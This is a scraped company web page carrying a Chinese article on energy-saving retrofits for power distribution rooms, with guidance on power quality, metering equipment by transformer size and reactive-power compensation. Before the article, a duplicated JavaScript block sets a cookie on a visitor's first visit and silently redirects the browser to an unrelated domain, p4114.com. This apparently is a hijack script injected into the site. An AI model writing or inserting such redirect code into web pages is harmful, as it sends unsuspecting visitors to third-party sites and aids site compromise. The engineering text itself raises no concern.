var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } 配电房节能改造整体解决方案-广东金辉华能源科技有限公司
全站搜索
文章正文
配电房节能改造整体解决方案
作者:管理员    发布于:2016-06-10 17:40:58    文字:【】【】【

Ÿ   电能质量

-         产生谐波、电力冲击、电压波动、闪变等干扰性负荷的特殊电力客户,对配电网影 响的治理工作应贯彻“谁污染,谁治理”的原则,由电力客户自行投资,并采取有效治理措施。

Ÿ   计量

-         10kV、315kVA 及以上用户专用变压器高压侧配置Ⅲ类关口计量装置,采用高压电 能计量柜或电能计量箱。

-         10kV、315kVA 以下用户专用变压器低压侧配置Ⅳ类关口计量装置,采用低压电能 计量柜或电能计量箱。


Ÿ   无功补偿

-         配电变压器的容量大于或等于100kVA 时,应配置无功补偿装置。

-         客户补偿后的功率因数低压侧不宜低于0.9,当不具备计算条件时,宜按配电变压器容量的20%-40%进行配置。

-         有谐波源的客户,在装设低压电容器时,应采取措施避免谐波污染。

脚注信息
版权所有 Copyright(C)since2016 广东金辉华能源科技有限公司